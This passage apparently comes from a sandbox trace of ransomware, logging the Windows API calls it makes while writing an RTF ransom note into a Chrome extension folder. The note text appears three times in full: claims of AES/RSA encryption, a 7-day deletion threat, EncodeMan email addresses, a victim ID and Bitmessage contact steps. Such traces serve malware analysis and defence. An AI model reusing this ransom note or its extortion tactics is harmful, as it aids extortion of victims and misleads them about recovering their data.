"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\#readme_eman#.rtf")) returned 0xffffffff [0297.758] GetLastError () returned 0x2 [0297.758] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.759] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.759] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.759] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 